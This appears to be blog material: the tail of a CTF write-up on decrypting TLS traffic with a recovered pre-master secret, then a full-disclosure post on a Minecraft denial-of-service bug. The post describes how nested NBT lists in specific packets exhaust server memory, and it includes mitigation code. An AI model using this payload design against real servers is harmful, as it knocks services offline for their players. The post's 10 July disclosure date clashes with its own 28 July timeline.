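Any exponent that maps g to the client’s public number yields the same shared secret, so it does not matter if the search returns a different representative than the one the client actually picked.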

Decrypting with Wireshark

In order to let Wireshark utilize this, it needs a file mapping TLS sessions to the master or pre-master secrets. So we made a file called keylogfile.txt containing:

PMS_CLIENT_RANDOM 358970edf3544c1181cecf3369cd4c0e69be2c3605662ba1288b251161eba51e f5ca9f85

PMS stands for Pre-Master Secret and the giant number in the middle is the client random, sent as part of the Client Hello packet, which is what Wireshark uses to map the PMS to the right TLS session.

(Note: Wireshark displays the timestamp and random bytes separately if you expand the Random portion in the TLS packet; the client random is the timestamp and random bytes together.)
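Generating that line by hand is error prone, so here is a small Python helper that formats it. The function name is made up; the output format is simply the PMS_CLIENT_RANDOM line shown above, with the pre-master secret written as whole bytes.

```python
def keylog_line(client_random, premaster_secret):
    """Format a PMS_CLIENT_RANDOM key log entry."""
    if len(client_random) != 32:
        raise ValueError("the client random must be exactly 32 bytes")
    # Write the secret as whole bytes so the hex string has an even length.
    length = max(1, (premaster_secret.bit_length() + 7) // 8)
    secret_hex = premaster_secret.to_bytes(length, "big").hex()
    return "PMS_CLIENT_RANDOM {} {}".format(client_random.hex(), secret_hex)


client_random = bytes.fromhex(
    "358970edf3544c1181cecf3369cd4c0e69be2c3605662ba1288b251161eba51e")
print(keylog_line(client_random, 0xf5ca9f85))
```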

We set up Wireshark’s TLS protocol settings to use the log file:

Wireshark TLS Preferences

and boom, follow the TLS stream in Wireshark for the flag:

Wireshark TLS Stream

A lesson on data structures, networking protocols, data sanitization and disclosure

Around 2 years ago, I was enthusiastically working on Spigot and Bukkit along with a couple of fairly popular plugins. During my poking around within the networking internals of Minecraft, I came across a fairly substantial problem that allowed anyone to send certain malformed packets and crash a server by running it out of memory.

Following the de facto standard procedure, I responsibly and privately disclosed the problem to Mojang on 10th July, 2013. That’s nearly 2 years ago. I asked for updates at one month intervals over the course of 3 months and was ignored or given highly unsatisfactory responses. I kept my hopes up that the problem would be patched and checked the source code on new releases whenever I could.

The version of the game when the vulnerability was reported was 1.6.2; the game is now on version 1.8.3. That’s right: through 2 major versions and dozens of minor versions, a critical vulnerability that allows you to crash any server and starve the actual machines of CPU and memory was allowed to exist.

The technical details

The Minecraft protocol enables the exchange of information about what an inventory slot contains. This allows you to, for example, get the items in your hotbar when you log in. Items in Minecraft also contain a feature that allows them to store arbitrary metadata (used for enhancements, books etc). This metadata is stored in a format known as NBT. The NBT format is essentially like JSON but in binary form. This allows it to store complex data structures with nesting and the like.

For example, the NBT metadata (known as a tag) for a book might look something like this

tag: {
    author: "ammar2",
    title: "Kitteh",
    pages: ["Kitties are cute", "I like kitties"]
}

The vulnerability stems from the fact that the client is allowed to send the server information about certain slots. This, coupled with the NBT format’s nesting allows us to craft a packet that is incredibly complex for the server to deserialize but trivial for us to generate.

In my case, I chose to create lists within lists, down to five levels. This is a JSON-like representation of what it looks like.

rekt: {
    list: [
        list: [
            list: [
                list: [
                    list: [
                        list: [
                        ]
                        list: [
                        ]
                        list: [
                        ]
                        list: [
                        ]
                    ]
                ]
            ]
        ]
    ]
}

The root of the object, rekt, contains 300 lists. Each list has a list with 10 sublists, and each of those sublists has 10 of their own, up until 5 levels of recursion. That’s a total of 10^5 * 300 = 30,000,000 lists. And this isn’t even the theoretical maximum for this attack. Just the NBT data for this payload is 26.6 megabytes. But luckily Minecraft implements a way to compress large packets, lucky us! zlib shrinks down our evil data to a mere 39 kilobytes.
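To get a feel for the numbers, here is a short Python sketch of the arithmetic, plus a demonstration of how well zlib handles highly repetitive data. The buffer of zero bytes is only a stand-in chosen for illustration, not the actual payload, and the function name is made up.

```python
import zlib


def count_lists(root_lists, fanout, depth):
    """Number of innermost lists for a tree with the given fan-out and depth."""
    return root_lists * fanout ** depth


total = count_lists(root_lists=300, fanout=10, depth=5)
print(total)

# Repetitive input compresses extremely well, which is why a tiny packet
# can expand into a huge amount of data on the receiving side.
sample = bytes(1_000_000)
packed = zlib.compress(sample)
print(len(sample), "->", len(packed), "bytes")
```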

Note: in previous versions of minecraft, there was no protocol wide compression for big packets. Previously, NBT was sent compressed with gzip and prefixed with a signed short of its length, which reduced our maximum payload size to 2^15 - 1. Now that the length is a varint capable of storing integers up to 2^28, our potential for attack has increased significantly. (for the more technically minded people, we fill the list up with TAG_ENDs, which aren’t accounted for by the accumulator Mojang attempted to implement to fix this)

When the server decompresses our data, it’ll have 27 megs in a buffer somewhere in memory, but that isn’t the bit that’ll kill it. When it attempts to parse it into NBT, it’ll create Java representations of the objects, meaning that suddenly the server has to create several million Java objects including ArrayLists. This runs the server out of memory and causes tremendous CPU load.

This vulnerability exists on almost all previous and current Minecraft versions as of 1.8.3. The packets used as attack vectors are the 0x08: Block Placement Packet and 0x10: Creative Inventory Action.

The fix for this vulnerability isn’t exactly that hard: the client should never really send a data structure as complex as NBT of arbitrary size, and if it must, some form of recursion and size limits should be implemented. These were the fixes that I recommended to Mojang 2 years ago.
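As a rough illustration of what such limits could look like, here is a Python sketch that walks a nested structure and rejects it once it gets too deep or too large. The limits and names are hypothetical, and it checks an already-parsed structure for simplicity; in a real server the same counters would need to be enforced while deserializing, before the objects are allocated.

```python
MAX_DEPTH = 8           # hypothetical nesting limit
MAX_ELEMENTS = 10_000   # hypothetical cap on the total number of tags


class TagTooComplex(ValueError):
    """Raised when a tag exceeds the nesting or size limits."""


def check_limits(value, max_depth=MAX_DEPTH, max_elements=MAX_ELEMENTS):
    """Walk nested lists/dicts iteratively and return the element count."""
    seen = 0
    stack = [(value, 1)]
    while stack:
        node, depth = stack.pop()
        seen += 1
        if seen > max_elements:
            raise TagTooComplex("too many elements")
        if isinstance(node, dict):
            children = list(node.values())
        elif isinstance(node, list):
            children = node
        else:
            continue                      # plain values have no children
        if depth > max_depth:
            raise TagTooComplex("nested too deeply")
        stack.extend((child, depth + 1) for child in children)
    return seen


book = {"author": "ammar2", "title": "Kitteh",
        "pages": ["Kitties are cute", "I like kitties"]}
print(check_limits(book))
```

Using an explicit stack instead of recursion means the check itself cannot be pushed into a stack overflow by a deeply nested input.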

Proof of concept

A proof of concept of this exploit can be seen here on my Github repo. The code to generate the poisoned NBT can be seen in start.py. The code has been tested under Python 2.7. Once you have connected to a server, simply enter exploit in the command line and the packet will be sent to the server.


I thought a lot before writing this post. On the one hand I don’t want to expose thousands of servers to a major vulnerability, yet on the other hand Mojang has failed to act upon it. Mojang is no longer a small indie company making a little indie game; their software is used by thousands of servers, and hundreds of thousands of people play on servers running their software at any given time. They have a responsibility to fix and properly work out problems like this. In addition, it should be noted that giving condescending responses to white hats who are responsibly disclosing vulnerabilities and trying to improve a product they enjoy is a surefire way to get developers disinterested the next time they come across a bug like this.


  1. 28th July, 2013: First contact with mojang employee about the issue, vulnerability disclosed and proof of concept provided.

  2. 19th August, 2013: Second time asking about fix, response given that it’s being worked on.

  3. 24th September, 2013: Third contact with employee, told that the problem has been delegated.

  4. 25th October, 2013: Fourth time I attempted to contact employee, ignored.

  5. 27th October, 2013: Another attempt to contact, ignored again. (at this point, I patiently waited for a fix)

In retrospect, yes, I should have given them a final warning sometime recently before this, but I just expected to be shot down again.

Update: With the release of this full disclosure I have actually made contact with mojang and they are working to fix the issue. Apparently the initial fix they tried failed which indicates a lack of proper testing.

Update 2: The exact problem that caused this bug to go unpatched has been identified. Mojang attempted to implement a fix for this problem, however they did not test their fix against the proof of concept I provided, which still crashed the server perfectly fine. This, in combination with ignoring me when I asked for status updates twice, led me to believe that Mojang had attempted no fix. In retrospect, a more recent final warning before this full disclosure was probably in order. A combination of miscommunication and lack of testing led to this situation today; hopefully it can be a good learning experience.

Update 3: This problem has been patched as of minecraft version 1.8.4


I’m happy to see that multiple other security issues have also been fixed. Once again, I feel better communication would have easily alleviated this problem. Keeping me in the loop and not ignoring me, in addition to proper testing would have easily led to this exploit being fixed long ago.

Edit: In regards to the statements that I never filed a report on their bug tracker, I’d just like to point out that nobody pointed me towards the tracker when I reported the issue, I wasn’t asked to make a ticket or told that I could follow the progress of the report on x-ticket.